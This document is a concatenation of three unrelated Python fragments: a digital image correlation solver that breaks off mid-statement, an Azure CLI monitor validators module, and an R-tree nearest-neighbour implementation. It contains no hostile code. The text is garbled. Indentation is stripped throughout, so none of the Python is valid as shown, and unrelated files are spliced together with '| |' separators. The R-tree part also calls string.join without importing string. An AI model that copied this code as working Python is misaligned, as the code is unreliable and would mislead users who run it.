import scipy.ndimage as nd
from .reference import generate_reference
from .reference_q4 import generate_reference_Q4, find_elm_borders_mesh, normalized_zero_mean
from ..IO.image_stack import ImageStack
from ..elements.b_splines import BSplineSurface
from ..elements.q4 import Q4
from ..mesh.meshUtilities import Mesh
from ..utils import convert_to_img_frame, find_element_borders
def correlate_img_to_ref_spline(node_pos, img, ref, settings):
"""
Correlate an image to a reference
The routine identifies the part of the image covered by the mesh and
tries to perform image correlation on this part of the image.
Parameters
----------
node_pos : ndarray
The position of the nodes
mesh : Mesh
The mesh object
img : ndarray
2d array containing the image
ref : Reference
The reference object
settings : DICInput
The settings which will be used during the analysis
Returns
-------
updated node positions, current pixel values
NOTES
-------
The function extracts a rectangular region of the image covered by the element, which may be very large
if the mesh is tilted. This would reduce the performance of the routine
"""
element_borders = find_element_borders(node_pos, settings.mesh)
image_frame, node_pos_img_coords = convert_to_img_frame(img, node_pos, settings.mesh, element_borders, settings)
node_position_increment, Ic, conv = correlate_frames(node_pos_img_coords, settings.mesh, image_frame, ref, settings)
node_position_new = node_pos + node_position_increment
return node_position_new, Ic, conv
def correlate_frames(node_pos, mesh, img, ref, settings):
"""
Parameters
----------
node_pos : ndarray
The position of the nodes
mesh : Mesh
The mesh object
img : ndarray
2d array containing the image frame
ref : Reference
The reference object
settings : DICInput
The settings which will be used during the analysis
Returns
-------
updated node positions, current pixel values
"""
logger = logging.getLogger(__name__)
node_pos = np.copy(node_pos).astype(settings.precision)
# Declare empty arrays
pixel_pos = np.zeros((2, ref.n_pixels), dtype=settings.precision)
dnod_x = np.zeros(mesh.n_nodes * 2)
image_filtered = nd.spline_filter(img, order=settings.interpolation_order).transpose()
for it in range(settings.maxit):
# Find nodal positions within ROI
np.dot(node_pos, ref.Nref_stack, out=pixel_pos)
# Find pixel values for current coordinates
Ic = nd.map_coordinates(image_filtered, pixel_pos, order=settings.interpolation_order, prefilter=False)
# Calculate position increment as (B^T B)^-1 * (B^T*dIk) "Least squares solution"
dnod = np.dot(ref.K, ref.I0_stack - Ic)
# Add increment to nodal positions
node_pos[0, :] += dnod[:mesh.n_nodes]
node_pos[1, :] += dnod[mesh.n_nodes:]
dnod_x += dnod
# Check for convergence
if np.max(np.abs(dnod)) < settings.tol:
logger.info('Frame converged in %s iterations', it)
return np.array((dnod_x[:mesh.n_nodes], dnod_x[mesh.n_nodes:])), Ic, True
# Reset array values
logger.info("Frame did not converge. Largest increment was %f pixels" % np.max(dnod))
return np.array((dnod_x[:mesh.n_nodes], dnod_x[mesh.n_nodes:])), Ic, False
def store_stripped_copy(reference_generator, storage):
"""
Store a stripped copy of the reference object
The stored reference object is stripped from all resource intensive variables
Parameters
----------
reference_generator : func
The reference generator function
storage : list
The list where the stripped references are appended
Returns
-------
reference_generator
"""
def wrapper(*args, **kwargs):
ref = reference_generator(*args, **kwargs)
ref_light = copy(ref)
# Remove the heavy fields
ref_light.Nref_stack = None
ref_light.B_stack = None
ref_light.K = None
storage.append(ref_light)
return ref
return wrapper
def correlate(inputs, correlator, reference_gen):
"""
Main correlation routine
This routine manages result storage, reference generation and
the necessary logic for handling convergence issues.
Parameters
----------
inputs : DIC_input object
The input object containing all necessary data for performing a DIC analysis.
Returns
-------
node_coords, reference_stack, Ic_stacks
"""
logger = logging.getLogger(__name__)
mesh = inputs.mesh
images = inputs.images
settings = inputs
# Do the initial setup
images.image_reader.precision = settings.precision
Ic_stacks = list()
reference_stack = list()
node_position_t = list()
if settings.store_internals:
gen_ref = store_stripped_copy(reference_gen, storage=reference_stack)
else:
gen_ref = reference_gen
if settings.node_hist:
node_coords = np.array(settings.node_hist, dtype=settings.precision)[:, :, 0]
else:
node_coords = np.array((mesh.xnodes, mesh.ynodes), dtype=settings.precision)
node_position_t.append(node_coords)
reference = gen_ref(node_coords, mesh, images[0], settings, image_id=0)
# Correlate the image frames
try:
for image_id in range(1, settings.max_nr_im):
logger.info('Processing frame nr: %i', image_id)
if settings.node_hist:
if len(settings.node_hist) >= image_id:
logger.info("Using initial conditions")
node_coords = np.array(settings.node_hist, dtype=settings.precision)[:, :, image_id]
else:
pass
if image_id in settings.ref_update:
logger.info('Updating reference at %i', image_id)
reference = gen_ref(node_coords, mesh, images[image_id - 1], settings, image_id=(image_id - 1))
img = images[image_id]
try:
node_coords, Ic, conv = correlator(node_coords, img, reference, settings)
if not conv:
# Handle the convergence issue
if settings.noconvergence == "ignore":
pass
elif settings.noconvergence == "update":
logger.info("Updating reference due to lack of convergence.")
reference = gen_ref(node_coords, mesh, images[image_id - 1], settings, image_id - 1)
node_coords, Ic, conv = correlator(node_coords, img, reference, settings)
if not conv:
logger.info("Updating reference did not fix convergence issues, aborting...")
break
elif settings.noconvergence == "break":
logger.info("Aborting due to convergence issues.")
break
except Exception as e:
logger.exception(e)
pass
if settings.store_internals:
Ic_stacks.append(Ic)
node_position_t.append(node_coords)
finally:
return np.array(node_position_t), reference_stack, Ic_stacks
def correlate_img_to_ref_q4(node_coordss, img, ref, settings):
# Instantiate empty arrays
node_coords = node_coordss.copy()
img = nd.spline_filter(img, order=settings.interpolation_order)
pix_cord_local = [np.zeros((2, ref.Nref_stack[elm_nr].shape[0]), dtype=np.float64) for elm_nr in
range(settings.mesh.n_elms)]
n_nodes = settings.mesh.n_nodes
n_nodes_elm = settings.mesh.element_def.n_nodes
di = np.zeros(n_nodes_elm * 2, dtype=np.float64)
dnod = np.zeros(n_nodes * 2, dtype=np.float64)
C = np.zeros(n_nodes * 2, dtype=np.float64)
# Find borders of the elements
borders = find_elm_borders_mesh(node_coords, settings.mesh, settings.mesh.n_elms)
# Extract image within element borders with padding
img_frames = [img[borders[2, el].astype(int) - settings.pad:borders[3, el].astype(int) + settings.pad,
borders[0, el].astype(int) - settings.pad:borders[1, el].astype(int) + settings.pad] for el in
range(settings.mesh.n_elms)]
# Normalize image frame flux
if False:
img_frames = map(normalized_zero_mean, img_frames)
# Element loop
# TODO: This implementation does handle errors very pretty...
for it in range(settings.maxit):
C[:] = 0.0
for el in range(settings.mesh.n_elms):
Ic = np.zeros_like(ref.I0_stack[el], dtype=np.float64)
# Find current coordinates element within the elm_frame
np.dot(ref.Nref_stack[el], node_coords[0, settings.mesh.ele[:, el]] - borders[0, el] + settings.pad,
out=pix_cord_local[el][1])
np.dot(ref.Nref_stack[el], node_coords[1, settings.mesh.ele[:, el]] - borders[2, el] + settings.pad,
out=pix_cord_local[el][0])
# Determine greyscale value at XYc
nd.map_coordinates(img_frames[el],
pix_cord_local[el], order=settings.interpolation_order, prefilter=False,
output=Ic)
# Calculate B^T * dIK
np.dot(ref.B_stack[el], (ref.I0_stack[el] - Ic), out=di)
# TODO: This shape is awkvard
# Order di to match format of K
C[(settings.mesh.ele[:, el] + 1) * 2 - 2] += di[:settings.elm.n_nodes]
C[(settings.mesh.ele[:, el] + 1) * 2 - 1] += di[settings.elm.n_nodes:]
# Calculate position increment as (B^T B)^-1 * (B^T*dIk) "Least squares solution"
np.dot(ref.K, C, out=dnod)
# Add increment to nodal positions
node_coords[0, :] += dnod[::2]
node_coords[1, :] += dnod[1::2]
# Check for convergence
if np.max(np.abs(dnod)) < settings.tol:
logging.info('Converged in %s iterations' % it)
return node_coords, Ic, True
logging.info('Did not converged in %s iterations last increment was %0.4f' % (it, np.max(np.abs(dnod))))
return node_coords, Ic, False
# Calculate correlation factor for this element
class DICAnalysis(object):
def __init__(self, inputs):
"""
DIC analysis
The analysis object verifies and stores the DIC_input object.
When instantiated, the .run() method can be called, initiating the DIC analysis.
Parameters
----------
inputs : DIC_input object
The input object containing all neccessary data for performing a DIC analysis.
Returns
-------
DIC_analysis object
Examples
--------
The following example runs a virtual experiment
>>> import muDIC as dic
>>> import numpy as np
>>> import muDIC.vlab as vlab
>>> image_shape = (2000, 2000)
>>> speckle_image = vlab.rosta_speckle(image_shape, dot_size=4, density=0.32, smoothness=2.0, layers=4)
>>> F = np.array([[1.1, .0], [0., 1.0]], dtype=np.float64)
>>> image_deformer = vlab.imageDeformer_from_defGrad(F)
>>> downsampler = vlab.Downsampler(image_shape=image_shape, factor=4, fill=0.8, pixel_offset_stddev=0.1)
>>> noise_injector = vlab.noise_injector("gaussian", sigma=.1)
>>> image_generator = vlab.VirtualExperiment(speckle_image=speckle_image, image_deformer=image_deformer,
>>> downsampler=downsampler, noise_injector=noise_injector, n=n)
>>> image_stack = dic.ImageStack(image_generator)
>>> mesher = dic.Mesher(deg_n=1,deg_e=1)
>>> mesh = mesher.mesh(image_stack)
>>> input = muDIC.solver.correlate.DIC_input(mesh, image_stack)
>>> dic_job = dic.DIC_analysis(input)
>>> results = dic_job.run()
"""
self.logger = logging.getLogger()
self.__input__ = self.__verify_dic_input__(inputs)
def run(self):
"""
Run analysis
Parameters
----------
Returns
-------
DIC_output object
"""
node_x, node_y, reference_stack, Ic_stack = self.__solve__()
return DICOutput(node_x, node_y, self.__input__, ref_stack=reference_stack, Ic_stack=Ic_stack)
def get_input(self):
return self.__input__
def __solve__(self):
# TODO: Explicitly check that element fomulation
if isinstance(self.__input__.mesh.element_def, BSplineSurface):
node_position, reference_stack, Ic_Stack = correlate(self.__input__, correlate_img_to_ref_spline,
generate_reference)
else:
node_position, reference_stack, Ic_Stack = correlate(self.__input__, correlate_img_to_ref_q4,
generate_reference_Q4)
# TODO: Remove the need of transposing the matrices
return node_position[:, 0, :].transpose(), node_position[:, 1,
:].transpose(), reference_stack, Ic_Stack
@staticmethod
def __verify_dic_input__(inputs):
"""
Input type checker. Verifies all input and calculates missing values if they can be deduced from the others.
"""
inputs_checked = inputs
if not isinstance(inputs_checked, DICInput):
raise TypeError('Inputs has to be an instance of the DICInput class')
if not isinstance(inputs_checked.images, (ImageStack)):
raise TypeError('Image stack is not an instance of ImageStack')
if not isinstance(inputs_checked.mesh, Mesh):
raise TypeError('Mesh should be an instance of Mesh')
if isinstance(inputs_checked.max_nr_im, int) and inputs_checked.max_nr_im <= len(inputs_checked.images):
pass
else:
inputs_checked.max_nr_im = len(inputs_checked.images)
if not | |
<reponame>xaliciayang/azure-cli
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from azure.cli.core.commands.validators import validate_tags, get_default_location_from_resource_group
from azure.cli.core.azclierror import RequiredArgumentMissingError, InvalidArgumentValueError
from knack.util import CLIError
def process_autoscale_create_namespace(cmd, namespace):
from msrestazure.tools import parse_resource_id
validate_tags(namespace)
get_target_resource_validator('resource', required=True, preserve_resource_group_parameter=True)(cmd, namespace)
if not namespace.resource_group_name:
namespace.resource_group_name = parse_resource_id(namespace.resource).get('resource_group', None)
get_default_location_from_resource_group(cmd, namespace)
def validate_autoscale_recurrence(namespace):
from azure.mgmt.monitor.models import Recurrence, RecurrentSchedule, RecurrenceFrequency
def _validate_weekly_recurrence(namespace):
# Construct days
valid_days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
days = []
for partial in namespace.recurrence[1:]:
if len(partial) < 2:
raise CLIError('specifying fewer than 2 characters for day is ambiguous.')
try:
match = next(x for x in valid_days if x.lower().startswith(partial.lower()))
except StopIteration:
raise CLIError("No match for day '{}'.".format(partial))
days.append(match)
valid_days.remove(match)
# validate, but don't process start and end time
recurrence_obj = Recurrence(
frequency=RecurrenceFrequency.week,
schedule=RecurrentSchedule(
time_zone=namespace.timezone,
days=days,
hours=[], # will be filled in during custom command
minutes=[] # will be filled in during custom command
)
)
return recurrence_obj
valid_recurrence = {
'week': {
'usage': '-r week [DAY DAY ...]',
'validator': _validate_weekly_recurrence
}
}
if namespace.recurrence:
raw_values = namespace.recurrence
try:
delimiter = raw_values[0].lower()
usage = valid_recurrence[delimiter]['usage']
try:
namespace.recurrence = valid_recurrence[delimiter]['validator'](namespace)
except CLIError as ex:
raise CLIError('{} invalid usage: {}'.format(ex, usage))
except KeyError:
raise CLIError('invalid usage: -r {{{}}} [ARG ARG ...]'.format(','.join(valid_recurrence)))
def validate_autoscale_timegrain(namespace):
from azure.mgmt.monitor.models import MetricTrigger
from azure.cli.command_modules.monitor.actions import get_period_type
from azure.cli.command_modules.monitor.util import get_autoscale_statistic_map
values = namespace.timegrain
if len(values) == 1:
# workaround because CMD.exe eats > character... Allows condition to be
# specified as a quoted expression
values = values[0].split(' ')
name_offset = 0
try:
time_grain = get_period_type()(values[1])
name_offset += 1
except ValueError:
time_grain = get_period_type()('1m')
try:
statistic = get_autoscale_statistic_map()[values[0]]
name_offset += 1
except KeyError:
statistic = get_autoscale_statistic_map()['avg']
timegrain = MetricTrigger(
metric_name=None,
metric_resource_uri=None,
time_grain=time_grain,
statistic=statistic,
time_window=None,
time_aggregation=None,
operator=None,
threshold=None
)
namespace.timegrain = timegrain
def get_target_resource_validator(dest, required, preserve_resource_group_parameter=False, alias='resource'):
def _validator(cmd, namespace):
from msrestazure.tools import is_valid_resource_id
name_or_id = getattr(namespace, dest)
rg = namespace.resource_group_name
res_ns = namespace.namespace
parent = namespace.parent
res_type = namespace.resource_type
usage_error = CLIError('usage error: --{0} ID | --{0} NAME --resource-group NAME '
'--{0}-type TYPE [--{0}-parent PARENT] '
'[--{0}-namespace NAMESPACE]'.format(alias))
if not name_or_id and required:
raise usage_error
if name_or_id:
if is_valid_resource_id(name_or_id) and any((res_ns, parent, res_type)):
raise usage_error
if not is_valid_resource_id(name_or_id):
from azure.cli.core.commands.client_factory import get_subscription_id
if res_type and '/' in res_type:
res_ns = res_ns or res_type.rsplit('/', 1)[0]
res_type = res_type.rsplit('/', 1)[1]
if not all((rg, res_ns, res_type, name_or_id)):
raise usage_error
setattr(namespace, dest,
'/subscriptions/{}/resourceGroups/{}/providers/{}/{}{}/{}'.format(
get_subscription_id(cmd.cli_ctx), rg, res_ns, parent + '/' if parent else '',
res_type, name_or_id))
del namespace.namespace
del namespace.parent
del namespace.resource_type
if not preserve_resource_group_parameter:
del namespace.resource_group_name
return _validator
def validate_metrics_alert_dimension(namespace):
from azure.cli.command_modules.monitor.grammar.metric_alert.MetricAlertConditionValidator import dim_op_conversion
for keyword, value in dim_op_conversion.items():
if namespace.operator == value:
namespace.operator = keyword
def validate_metrics_alert_condition(namespace):
from azure.cli.command_modules.monitor.grammar.metric_alert.MetricAlertConditionValidator import op_conversion, \
agg_conversion, sens_conversion
for keyword, value in agg_conversion.items():
if namespace.aggregation == value:
namespace.aggregation = keyword
break
for keyword, value in op_conversion.items():
if namespace.operator == value:
namespace.operator = keyword
break
if namespace.condition_type == 'static':
if namespace.threshold is None:
raise RequiredArgumentMissingError('Parameter --threshold is required for static threshold.')
if namespace.operator not in ('=', '!=', '>', '>=', '<', '<='):
raise InvalidArgumentValueError('Parameter --operator {} is invalid for static threshold.'.format(
op_conversion[namespace.operator]
))
elif namespace.condition_type == 'dynamic':
if namespace.operator not in ('>', '<', '><'):
raise InvalidArgumentValueError('Parameter --operator {} is invalid for dynamic threshold.'.format(
op_conversion[namespace.operator]
))
if namespace.alert_sensitivity is None:
raise RequiredArgumentMissingError('Parameter --sensitivity is required for dynamic threshold.')
for keyword, value in sens_conversion.items():
if namespace.alert_sensitivity == value:
namespace.alert_sensitivity = keyword
break
if namespace.number_of_evaluation_periods is None:
setattr(namespace, 'number_of_evaluation_periods', 4)
if namespace.number_of_evaluation_periods < 1 or namespace.number_of_evaluation_periods > 6:
raise InvalidArgumentValueError('Parameter --num-periods {} should in range 1-6.'.format(
namespace.number_of_evaluation_periods
))
if namespace.min_failing_periods_to_alert is None:
setattr(namespace, 'min_failing_periods_to_alert', min(4, namespace.number_of_evaluation_periods))
if namespace.min_failing_periods_to_alert < 1 or namespace.min_failing_periods_to_alert > 6:
raise InvalidArgumentValueError('Parameter --num-violations {} should in range 1-6.'.format(
namespace.min_failing_periods_to_alert
))
if namespace.min_failing_periods_to_alert > namespace.number_of_evaluation_periods:
raise InvalidArgumentValueError(
'Parameter --num-violations {} should be less than or equal to parameter --num-periods {}.'.format(
namespace.min_failing_periods_to_alert, namespace.number_of_evaluation_periods))
else:
raise NotImplementedError()
def validate_diagnostic_settings(cmd, namespace):
from azure.cli.core.commands.client_factory import get_subscription_id
from msrestazure.tools import is_valid_resource_id, resource_id, parse_resource_id
get_target_resource_validator('resource_uri', required=True, preserve_resource_group_parameter=True)(cmd, namespace)
if not namespace.resource_group_name:
namespace.resource_group_name = parse_resource_id(namespace.resource_uri)['resource_group']
if namespace.storage_account and not is_valid_resource_id(namespace.storage_account):
namespace.storage_account = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
resource_group=namespace.resource_group_name,
namespace='microsoft.Storage',
type='storageAccounts',
name=namespace.storage_account)
if namespace.workspace and not is_valid_resource_id(namespace.workspace):
namespace.workspace = resource_id(subscription=get_subscription_id(cmd.cli_ctx),
resource_group=namespace.resource_group_name,
namespace='microsoft.OperationalInsights',
type='workspaces',
name=namespace.workspace)
if namespace.event_hub and is_valid_resource_id(namespace.event_hub):
namespace.event_hub = parse_resource_id(namespace.event_hub)['name']
if namespace.event_hub_rule:
if not is_valid_resource_id(namespace.event_hub_rule):
if not namespace.event_hub:
raise CLIError('usage error: --event-hub-rule ID | --event-hub-rule NAME --event-hub NAME')
# use value from --event-hub if the rule is a name
namespace.event_hub_rule = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=namespace.resource_group_name,
namespace='Microsoft.EventHub',
type='namespaces',
name=namespace.event_hub,
child_type_1='AuthorizationRules',
child_name_1=namespace.event_hub_rule)
elif not namespace.event_hub:
# extract the event hub name from `--event-hub-rule` if provided as an ID
namespace.event_hub = parse_resource_id(namespace.event_hub_rule)['name']
if not any([namespace.storage_account, namespace.workspace, namespace.event_hub]):
raise CLIError(
'usage error - expected one or more: --storage-account NAME_OR_ID | --workspace NAME_OR_ID '
'| --event-hub NAME_OR_ID | --event-hub-rule ID')
try:
del namespace.resource_group_name
except AttributeError:
pass
def _validate_tags(namespace):
""" Extracts multiple space-separated tags in key[=value] format """
if isinstance(namespace.tags, list):
tags_dict = {}
for item in namespace.tags:
tags_dict.update(_validate_tag(item))
namespace.tags = tags_dict
def _validate_tag(string):
""" Extracts a single tag in key[=value] format """
result = {}
if string:
comps = string.split('=', 1)
result = {comps[0]: comps[1]} if len(comps) > 1 else {string: ''}
return result
def process_action_group_detail_for_creation(namespace):
from azure.mgmt.monitor.models import ActionGroupResource, EmailReceiver, SmsReceiver, WebhookReceiver, \
ArmRoleReceiver, AzureAppPushReceiver, ItsmReceiver, AutomationRunbookReceiver, \
VoiceReceiver, LogicAppReceiver, AzureFunctionReceiver
_validate_tags(namespace)
ns = vars(namespace)
name = ns['action_group_name']
receivers = ns.pop('receivers') or []
action_group_resource_properties = {
'location': 'global', # as of now, 'global' is the only available location for action group
'group_short_name': ns.pop('short_name') or name[:12], # '12' is the short name length limitation
'email_receivers': [r for r in receivers if isinstance(r, EmailReceiver)],
'sms_receivers': [r for r in receivers if isinstance(r, SmsReceiver)],
'webhook_receivers': [r for r in receivers if isinstance(r, WebhookReceiver)],
'arm_role_receivers': [r for r in receivers if isinstance(r, ArmRoleReceiver)],
'itsm_receivers': [r for r in receivers if isinstance(r, ItsmReceiver)],
'azure_app_push_receivers': [r for r in receivers if isinstance(r, AzureAppPushReceiver)],
'automation_runbook_receivers': [r for r in receivers if isinstance(r, AutomationRunbookReceiver)],
'voice_receivers': [r for r in receivers if isinstance(r, VoiceReceiver)],
'logic_app_receivers': [r for r in receivers if isinstance(r, LogicAppReceiver)],
'azure_function_receivers': [r for r in receivers if isinstance(r, AzureFunctionReceiver)],
'tags': ns.get('tags') or None
}
ns['action_group'] = ActionGroupResource(**action_group_resource_properties)
def validate_metric_dimension(namespace):
if not namespace.dimension:
return
if namespace.filters:
raise CLIError('usage: --dimension and --filter parameters are mutually exclusive.')
namespace.filters = ' and '.join("{} eq '*'".format(d) for d in namespace.dimension)
def process_webhook_prop(namespace):
if not isinstance(namespace.webhook_properties, list):
return
result = {}
for each in namespace.webhook_properties:
if each:
if '=' in each:
key, value = each.split('=', 1)
else:
key, value = each, ''
result[key] = value
namespace.webhook_properties = result
def get_action_group_validator(dest):
def validate_action_groups(cmd, namespace):
action_groups = getattr(namespace, dest, None)
if not action_groups:
return
from msrestazure.tools import is_valid_resource_id, resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
resource_group = namespace.resource_group_name
for group in action_groups:
if not is_valid_resource_id(group.action_group_id):
group.action_group_id = resource_id(
subscription=subscription,
resource_group=resource_group,
namespace='microsoft.insights',
type='actionGroups',
name=group.action_group_id
)
return validate_action_groups
def get_action_group_id_validator(dest):
def validate_action_group_ids(cmd, namespace):
action_groups = getattr(namespace, dest, None)
if not action_groups:
return
from msrestazure.tools import is_valid_resource_id, resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
action_group_ids = []
subscription = get_subscription_id(cmd.cli_ctx)
resource_group = namespace.resource_group_name
for group in action_groups:
if not is_valid_resource_id(group):
group = resource_id(
subscription=subscription,
resource_group=resource_group,
namespace='microsoft.insights',
type='actionGroups',
name=group
)
action_group_ids.append(group.lower())
setattr(namespace, dest, action_group_ids)
return validate_action_group_ids
def validate_private_endpoint_connection_id(namespace):
if namespace.connection_id:
from azure.cli.core.util import parse_proxy_resource_id
result = parse_proxy_resource_id(namespace.connection_id)
namespace.resource_group_name = result['resource_group']
namespace.scope_name = result['name']
namespace.private_endpoint_connection_name = result['child_name_1']
if not all([namespace.scope_name, namespace.resource_group_name, namespace.private_endpoint_connection_name]):
raise CLIError('incorrect usage. Please provide [--id ID] or [--name NAME --scope-name NAME -g NAME]')
del namespace.connection_id
def validate_storage_accounts_name_or_id(cmd, namespace):
if namespace.storage_account_ids:
from msrestazure.tools import is_valid_resource_id, resource_id
from azure.cli.core.commands.client_factory import get_subscription_id
for index, storage_account_id in enumerate(namespace.storage_account_ids):
if not is_valid_resource_id(storage_account_id):
namespace.storage_account_ids[index] = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=namespace.resource_group_name,
namespace='Microsoft.Storage',
type='storageAccounts',
name=storage_account_id
)
def process_subscription_id(cmd, namespace):
from azure.cli.core.commands.client_factory import get_subscription_id
namespace.subscription_id = get_subscription_id(cmd.cli_ctx)
def process_workspace_data_export_destination(namespace):
if namespace.destination:
from azure.mgmt.core.tools import is_valid_resource_id, resource_id, parse_resource_id
if not is_valid_resource_id(namespace.destination):
raise CLIError('usage error: --destination should be a storage account, '
'an evenhug namespace or an event hub resource id.')
result = parse_resource_id(namespace.destination)
if result['namespace'].lower() == 'microsoft.storage' and result['type'].lower() == 'storageaccounts':
namespace.data_export_type = 'StorageAccount'
elif result['namespace'].lower() == 'microsoft.eventhub' and result['type'].lower() == 'namespaces':
namespace.data_export_type = 'EventHub'
namespace.destination = resource_id(
subscription=result['subscription'],
resource_group=result['resource_group'],
namespace=result['namespace'],
| |
# 2015-05-22
# r-tree featuring insert, nn and k-nn search with threshold distance
# tie-breaking for same distance is identifier value with largest values appearing earlier
# updated on 2016-08-22 to fix some bugs and re-structure
# updated on 2016-08-23 to fix traditional/non-traditional isLeafNode() distinction
# updated on 2016-11-02 to re-structure and modify adjustTree();
# stop at root instead of non-existent parent of root;
# note that there is a bug with setting M to two
# updated on 2016-11-03 to implement delete();
# note, however, that our tree lacks entry-aware nodes
# updated on 2016-11-05 to fix delete() by making addition of entries idempotent
import heapq
class PriorityQueue:
"""
Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
# priorities are (-1 * distance, -1 * id-value) pairs
def __init__(self):
self.heap = []
def push(self, item, priority):
pair = (priority,item)
heapq.heappush(self.heap,pair)
def pop(self):
(priority,item) = heapq.heappop(self.heap)
return item
def isEmpty(self):
return len(self.heap) == 0
# returns a (priority, item) pair
def peek(self):
heap = self.heap
pair = heap[0]
# item = pair[1]
result = pair
return result
def toList(self):
pair_list = self.heap
items = [x[1] for x in pair_list]
return items
def getSize(self):
return len(self.heap)
import math
def getDistance(point1, point2):
x1, y1 = point1
x2, y2 = point2
change_x = x2 - x1
change_y = y2 - y1
distance = math.sqrt(change_x ** 2 + change_y ** 2)
return distance
class NearestNeighbor:
def __init__(self, close_item = None, distance = float("inf")):
self.close_item = close_item
self.distance = distance
def getCloseItem(self):
return self.close_item
def getDistance(self):
return self.distance
def setCloseItem(self, close_item):
self.close_item = close_item
def setDistance(self, distance):
self.distance = distance
def toString(self):
result_str = str(self.getCloseItem()) + " " + str(self.getDistance())
return result_str
class KNearestNeighbor:
def __init__(self, query_point, close_item_pq, k = 100):
self.query_point = query_point
# priority queue we use uses a min-heap
# as a result, we negate priorities
self.close_item_pq = close_item_pq
self.k = k
# note that we do not always retrieve k items - could be less or could be more due to threshold
def getCloseItems(self):
return (self.close_item_pq).toList()
# have special behavior for when no items are in queue
def getFarthestCloseDistance(self):
if self.getNumCloseItems() == 0:
return float("inf")
else:
result = (self.close_item_pq).peek()
priority, item = result
# distance = -1 * priority
distance = -1 * priority[0]
id_value = priority[1]
# print "distance:", distance
return distance
def addCloseItem(self, close_item):
point = close_item
# id_value = point.getIDValue()
query_point = self.query_point
point_location = (point.getX(), point.getY())
id_value = point.getIDValue()
# distance = getDistance(query_point, point_location)
distance = getDistance(query_point, point_location)
priority = (-1 * distance, id_value)
# print "priority:", priority
(self.close_item_pq).push(close_item, priority)
def removeCloseItem(self):
(self.close_item_pq).pop()
def getNumCloseItems(self):
# print self.close_item_pq.getSize()
return (self.close_item_pq).getSize()
def addAndRemoveIfNecessary(self, close_item):
# print close_item, self.isFull()
# do_remove = self.isFull() == True
# use this so that we have enough to work with when we sort and cull
# print "close item:", close_item
do_remove = self.isFull() == True and self.passesThresholdForFarthestCloseItem(close_item) == True
# do_remove = self.isFull() == True
self.addCloseItem(close_item)
if do_remove == True:
self.removeCloseItem()
def isFull(self):
return self.getNumCloseItems() >= self.k
# returns True if distance for item 'close_item' is >= 0.001 that of the farthest close item
def passesThresholdForFarthestCloseItem(self, close_item):
distance = self.getFarthestCloseDistance()
query_point = self.query_point
point = close_item
point_location = (point.getX(), point.getY())
curr_distance = getDistance(query_point, point_location)
return curr_distance > distance + 0.001
def toString(self):
close_items = self.getCloseItems()
# print close_items
close_item_str_list = [str(x) for x in close_items]
close_item_str = string.join(close_item_str_list, " ")
result_str = close_item_str + " " + str(self.getFarthestCloseDistance())
return result_str
# internal nodes have entries
# have one-to-one relationship between nodes and entries
class RTreeNode:
def __init__(self, parent, entries, is_leaf):
self.parent = parent
# self.entries = entries
self.is_leaf = is_leaf
"""
self.m = 1
self.M = 4
"""
self.m = 8
self.M = 16
self.child_to_entry_dict = {}
for entry in entries:
curr_child = entry.getChild()
(self.child_to_entry_dict)[curr_child] = entry
def getParent(self):
return self.parent
def getEntries(self):
# return self.entries
return (self.child_to_entry_dict).values()
def getEntryForChild(self, child_node):
return (self.child_to_entry_dict)[child_node]
def getChildren(self):
"""
entries = self.getEntries()
children = [x.getChild() for x in entries]
return children
"""
return (self.child_to_entry_dict).keys()
def getNumEntries(self):
# return len(self.getEntries())
return len(self.child_to_entry_dict)
def getNumChildren(self):
# return len(self.getChildren())
return self.getNumEntries()
def setParent(self, node):
self.parent = node
"""
def isTraditionalLeafNode(self):
is_traditional_leaf_node = self.getNumEntries() == 0
return is_traditional_leaf_node
"""
def isNonTraditionalLeafNode(self):
is_non_traditional_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and False not in [x.getChild().getNumEntries() == 0 for x in self.getEntries()])
return is_non_traditional_leaf_node
def isLeafNode(self):
return self.getNumChildren() == 0
# return self.is_leaf
# is_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and False not in [x.getChild().getNumEntries() == 0 for x in self.getEntries()])
# is_leaf_node = (self.getParent() == None and self.getNumChildren() == 0) or (self.getNumChildren() != 0 and True in [x.getChild().getNumEntries() == 0 for x in self.getEntries()])
return is_leaf_node
def setIsLeafNode(self, is_leaf):
self.is_leaf = is_leaf
def addEntry(self, entry):
# print "adding an entry:", entry.getMBR().toString()
# (self.entries).append(entry)
# now idempotent
curr_child = entry.getChild()
(self.child_to_entry_dict)[curr_child] = entry
# entry must match exactly
def removeEntry(self, entry):
# index = (self.entries).index(entry)
# (self.entries).pop(index)
curr_child = entry.getChild()
(self.child_to_entry_dict).pop(curr_child)
def getMinimumNumEntriesPerNode(self):
return self.m
def getMaximumNumEntriesPerNode(self):
return self.M
def isFull(self):
return self.getNumEntries() >= self.getMaximumNumEntriesPerNode()
def isUnderfull(self):
return self.getNumEntries() < self.getMinimumNumEntriesPerNode()
"""
# indexing starts at zero
def getIndexForEntry(self, entry):
index = (self.entries).index(entry)
return index
def removeIthEntry(self, i):
(self.entries).pop(i)
"""
def retrieveEntryForChild(self, node):
entries = self.getEntries()
children = [x.getChild() for x in entries]
# print "children:", [x.toString() for x in children]
# print "child:", node.toString()
# print "mbr's:", [x.getMBR().toString() for x in entries]
index = children.index(node)
chosen_entry = entries[index]
return chosen_entry
"""
# indexing starts at zero
def getIthEntry(self, i):
return (self.entries)[i]
"""
def toString(self):
return str(self.getEntries())
# an entry is effectively an (mbr, child) pair
# mbr may be composite or raw
class RTreeEntry:
def __init__(self, mbr, child):
self.mbr = mbr
self.child = child
def getMBR(self):
return self.mbr
def setMBR(self, mbr):
self.mbr = mbr
def getChild(self):
return self.child
def setChild(self, node):
self.child = node
# x goes from left (negative) to right (positive)
